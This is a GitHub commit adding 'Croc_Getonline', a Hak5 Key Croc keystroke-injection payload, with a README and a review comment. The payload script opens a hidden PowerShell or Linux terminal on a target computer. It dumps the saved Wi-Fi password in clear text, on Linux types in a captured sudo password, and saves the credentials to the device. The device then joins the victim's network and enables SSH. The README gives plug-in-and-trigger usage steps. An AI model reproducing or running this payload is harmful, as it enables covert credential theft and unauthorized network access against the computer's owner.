Merge pull request #58 from spywill/master

Croc_Getonline
hak5glytch 2023-03-17 12:01:18 -05:00 committed by GitHub
commit 0ef3f8ae6d
2 changed files with 196 additions and 0 deletions


@ -0,0 +1,118 @@
# Title: Croc_Getonline
# Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
# Author: spywill
# Version: 3.5
# Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
MATCH (getonline_W|getonline_R|getonline_L)
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt
if [ -f $wifi_pass ]; then
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
rm -f $wifi_pass
fi
ATTACKMODE HID STORAGE
Q DELAY 5000
LED ATTACK
case $LOOT in
getonline_W)
Q GUI r
Q DELAY 3000
Q STRING "powershell -NoP -NonI -W Hidden"
Q ENTER
Q DELAY 5000
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
Q ENTER
Q DELAY 3000
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
Q ENTER
Q DELAY 2000
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
Q ENTER
Q DELAY 2000
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
Q ENTER
Q DELAY 5000
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
Q ENTER
;;
getonline_R)
Q CONTROL-ALT-d
Q CONTROL-ALT-t
Q DELAY 2000
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
Q ENTER
Q DELAY 2000
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q ENTER
Q DELAY 2000
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
Q ENTER
Q DELAY 2000
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
Q ENTER
Q DELAY 3000
Q STRING "umount \$MOUNT_POINT ; exit"
Q ENTER
;;
getonline_L)
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
PC_PW=LINUX
fi
Q CONTROL-ALT-d
Q ALT-t
Q DELAY 2000
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
Q ENTER
Q DELAY 2000
Q STRING "$PC_PW"
Q ENTER
Q DELAY 2000
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q ENTER
Q DELAY 2000
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
Q ENTER
Q DELAY 2000
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
Q ENTER
Q DELAY 3000
Q STRING "sudo umount \$MOUNT_POINT ; exit"
Q ENTER
;;
esac
ATTACKMODE HID
sleep 3
LED SETUP
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
ifconfig wlan0 down
if [ "$LOOT" = "getonline_W" ]; then
sed -i '0,/./s/^.//' $wifi_pass
sed -i 's/\r//g' $wifi_pass
fi
sed -i 's/\( \)*/\1/g' $wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
sleep 3
systemctl restart ssh.service
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
sleep 3
LED OFF
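Review bot: The reachability check near the end of the hunk, `[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R`, only works because the redirection is attached to the `[` builtin and fails before the always-true string test runs; it reads as a `test` expression rather than a connection attempt, and the `a && b || c` chain would also run `LED R` if `LED FINISH` itself returned non-zero. Writing it as `if : >/dev/tcp/8.8.8.8/53; then LED FINISH; else LED R; fi` keeps the same behaviour and makes the intent visible. The header comment should also state the persistent side effects the rest of the hunk has on the device itself: the `sed -i` lines rewrite lines of `config.txt` (the `/^[WS]/d` expression drops every line beginning with W or S, not only the `WIFI_*`/`SSH` entries), `wpa_supplicant`/`dhclient` are killed and `ssh.service` restarted, and the previous `wifipass.txt` is appended in plaintext to `loot/Croc_Pot/old_wifipass.txt` on every run, so that file grows without bound. Note too that L111 and L112 address `root/udisk/config.txt` without a leading slash while every other path in the file is absolute; whether that is intentional cannot be told from the hunk, so a one-line comment on it would help.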


@ -0,0 +1,78 @@
# Croc_Getonline
## INTRODUCTION :
- This project is developed for the HAK5 KeyCroc
- Attempt to connect Keycroc automatically to target wifi access point.
* **TESTED ON**
- Windows 10
- Raspberry pi 4 (bullseye image)
- linux (parrot os)
## INSTALLATION :
- Enter arming mode on your keycroc to install file.
- Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**
## STARTING GETONLINE :
- After install plug into target and type in anywhere
- **getonline_W** <-- MATCH word for windows
- **getonline_L** <-- MATCH word for Linux
- **getonline_R** <-- MATCH word for Raspberry pi
- When the payload is done running the LED will light up green
- Keycroc should now be connected to target wifi access point
- NOTE: for linux edit payload for passwd needed for sudo permission
## PAYLOAD INFO :
**PowerShell script that performs the following actions:**
Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet.
Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT.
Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script.
**Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc.
Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
Gets the password for the current wireless network by searching for the SSID in the /etc/wpa_supplicant/wpa_supplicant.conf file and extracting the password using sed.
Writes the SSID and password to a file located at $MOUNT_POINT using tee.
Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
**Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb.
Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist.
Mounts the volume with the label "KeyCroc" to the mount point directory using the mount command with the -L flag to specify the label of the volume to be mounted.
Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
Gets the password for the current wireless network by searching for the SSID in the /etc/NetworkManager/system-connections/ directory and extracting the password using grep and sed.
Writes the SSID and password to a file located at $MOUNT_POINT using tee with sudo to obtain elevated privileges.
Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc".
**-Sed command that performs the following actions:**
By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus:
1{x;s#^#sed -n 1p wifipass.txt#e;x}
1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s
x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space.
s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only.
x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space.
10{G;s/\n(\S+).*/ \1/}
10{..} executes the commands between the ellipses on the tenth line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator.
s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column.
11{G;s/\n\S+//}
11{..} executes the commands between the ellipses on the eleventh line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator.
s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column.